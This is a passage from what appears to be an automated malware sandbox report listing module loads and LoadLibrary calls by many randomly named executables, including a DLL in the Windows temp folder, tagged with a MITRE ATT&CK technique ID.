\"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"0862264.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0862264.exe\" loaded module \"KERNEL32\" at base 76330000\n \"0862264.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0862264.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"6042668.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"6042668.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6042668.exe\" loaded module \"KERNEL32\" at base 76330000\n \"6042668.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6042668.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"6042668.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"6408002.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"6408002.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6408002.exe\" loaded module \"KERNEL32\" at base 76330000\n \"6408002.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6408002.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"8266402.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"8266402.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8266402.exe\" loaded module \"KERNEL32\" at base 76330000\n \"8266402.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8266402.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"jdtpf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"jdtpf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jdtpf.exe\" loaded module \"KERNEL32\" at base 76330000\n \"jdtpf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jdtpf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"tbhlt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"tbhlt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tbhlt.exe\" loaded module \"KERNEL32\" at base 76330000\n \"tbhlt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tbhlt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"tbhlt.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"82880.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"82880.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"82880.exe\" loaded module \"KERNEL32\" at base 76330000\n \"82880.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"82880.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"44882.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"44882.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"44882.exe\" loaded module \"KERNEL32\" at base 76330000\n \"44882.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"44882.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"028488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"028488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"028488.exe\" loaded module \"KERNEL32\" at base 76330000\n \"028488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"028488.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"62820.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"62820.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"62820.exe\" loaded module \"KERNEL32\" at base 76330000\n \"62820.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"62820.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"22884.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"22884.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22884.exe\" loaded module \"KERNEL32\" at base 76330000\n \"22884.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22884.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"88220.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"88220.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"88220.exe\" loaded module \"KERNEL32\" at base 76330000\n \"88220.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"88220.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"2466400.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"2466400.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2466400.exe\" loaded module \"KERNEL32\" at base 76330000\n \"2466400.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2466400.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"04466.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"04466.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"04466.exe\" loaded module \"KERNEL32\" at base 76330000\n \"04466.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"04466.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"088400.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"088400.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"088400.exe\" loaded module \"KERNEL32\" at base 76330000\n \"088400.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"088400.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"444866.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"444866.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"444866.exe\" loaded module \"KERNEL32\" at base 76330000\n \"444866.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"444866.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"66822.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"66822.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66822.exe\" loaded module \"KERNEL32\" at base 76330000\n \"66822.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tvvfv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"tvvfv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tvvfv.exe\" loaded module \"KERNEL32\" at base 76330000\n \"tvvfv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tvvfv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"tvvfv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"bvfpxr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"bvfpxr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bvfpxr.exe\" loaded module \"KERNEL32\" at base 76330000\n \"bvfpxr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bvfpxr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"htbtt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"htbtt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"htbtt.exe\" loaded module \"KERNEL32\" at base 76330000\n \"htbtt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"htbtt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"6266488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"6266488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6266488.exe\" loaded module \"KERNEL32\" at base 76330000\n \"6266488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6266488.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"6266488.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"fttbvhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"fttbvhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fttbvhn.exe\" loaded module \"KERNEL32\" at base 76330000\n \"fttbvhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fttbvhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"fttbvhn.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"fnhrv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"fnhrv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fnhrv.exe\" loaded module \"KERNEL32\" at base 76330000\n \"fnhrv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fnhrv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"fnhrv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"tthvrx.exe\" loaded module \"MSVCRT.DLL\" at base 77970000\n \"tthvrx.exe\" loaded module \"SHLWAPI.DLL\" at base 76240000\n \"tthvrx.exe\" loaded module \"USER32.DLL\" at base 770b0000\n \"tthvrx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"rddvv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"rddvv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rddvv.exe\" loaded module \"KERNEL32\" at base 76330000\n \"rddvv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rddvv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"vjtpp.exe\" loaded module \"MSVCRT.DLL\" at base 77970000\n \"vjtpp.exe\" loaded module \"SHLWAPI.DLL\" at base 76240000\n \"vjtpp.exe\" loaded module \"USER32.DLL\" at base 770b0000\n \"vjtpp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"tlflpxl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"tlflpxl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tlflpxl.exe\" loaded module \"KERNEL32\" at base 76330000\n \"tlflpxl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tlflpxl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"ndnvbhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"ndnvbhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ndnvbhn.exe\" loaded module \"KERNEL32\" at base 76330000\n \"ndnvbhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ndnvbhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"260604.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"086684.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"086684.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"086684.exe\" loaded module \"KERNEL32\" at base 76330000\n \"086684.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"086684.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"64644.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"64644.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64644.exe\" loaded module \"KERNEL32\" at base 76330000\n \"64644.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6460462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000\n \"24440.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"24440.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24440.exe\" loaded module \"KERNEL32\" at base 76330000\n \"24440.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24440.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"08802.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"08802.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08802.exe\" loaded module \"KERNEL32\" at base 76330000\n \"08802.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08802.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"0248006.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"0248006.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0248006.exe\" loaded module \"KERNEL32\" at base 76330000\n \"0248006.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"226688.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71ad0000\n \"226688.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"226688.exe\" loaded module \"KERNEL32\" at base 76330000\n \"226688.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"226688.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ade0000\n \"226688.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75aa0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"2662206.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005996)\n \"2662206.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005996)\n \"2662206.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005996)\n \"202828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005856)\n \"202828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005856)\n \"202828.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"202828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005856)\n \"pndnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005832)\n \"pndnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005832)\n \"pndnt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005832)\n \"pndnt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005832)\n \"rhhbnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004260)\n \"rhhbnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004260)\n \"rhhbnrn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004260)\n \"rhhbnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004260)\n \"txphbj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004160)\n \"txphbj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004160)\n \"txphbj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004160)\n \"txphbj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004160)\n \"0862264.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004176)\n \"0862264.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004176)\n \"0862264.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004176)\n \"0862264.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004176)\n \"6042668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005956)\n \"6042668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005956)\n \"6042668.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005956)\n \"6042668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005956)\n \"6408002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004220)\n \"6408002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004220)\n \"6408002.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004220)\n \"6408002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004220)\n \"8266402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003476)\n \"8266402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003476)\n \"8266402.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003476)\n \"8266402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003476)\n \"jdtpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003904)\n \"jdtpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003904)\n \"jdtpf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003904)\n \"jdtpf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003904)\n \"tbhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003652)\n \"tbhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003652)\n \"tbhlt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003652)\n \"tbhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003652)\n \"82880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001976)\n \"82880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001976)\n \"82880.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001976)\n \"82880.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001976)\n \"44882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002492)\n \"44882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002492)\n \"44882.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002492)\n \"44882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002492)\n \"028488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004388)\n \"028488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004388)\n \"028488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004388)\n \"028488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004388)\n \"62820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003968)\n \"62820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003968)\n \"62820.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003968)\n \"62820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003968)\n \"22884.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003556)\n \"22884.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003556)\n \"22884.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003556)\n \"22884.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003556)\n \"88220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003420)\n \"88220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003420)\n \"88220.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003420)\n \"88220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003420)\n \"2466400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002268)\n \"2466400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002268)\n \"2466400.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002268)\n \"2466400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002268)\n \"04466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004408)\n \"04466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004408)\n \"04466.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004408)\n \"04466.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004408)\n \"088400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004248)\n \"088400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004248)\n \"088400.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004248)\n \"088400.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004248)\n \"444866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003564)\n \"444866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003564)\n \"444866.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003564)\n \"444866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003564)\n \"66822.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002164)\n \"66822.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002164)\n \"66822.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002164)\n \"66822.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002164)\n \"tvvfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002172)\n \"tvvfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002172)\n \"tvvfv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002172)\n \"tvvfv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002172)\n \"bvfpxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006132)\n \"bvfpxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006132)\n \"bvfpxr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006132)\n \"bvfpxr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006132)\n \"htbtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006112)\n \"htbtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006112)\n \"htbtt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006112)\n \"htbtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006112)\n \"6266488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003380)\n \"6266488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003380)\n \"6266488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003380)\n \"6266488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003380)\n \"fttbvhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003200)\n \"fttbvhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003200)\n \"fttbvhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003200)\n \"fttbvhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003200)\n \"fnhrv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003684)\n \"fnhrv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003684)\n \"fnhrv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003684)\n \"fnhrv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003684)\n \"tthvrx.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003164)\n \"tthvrx.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 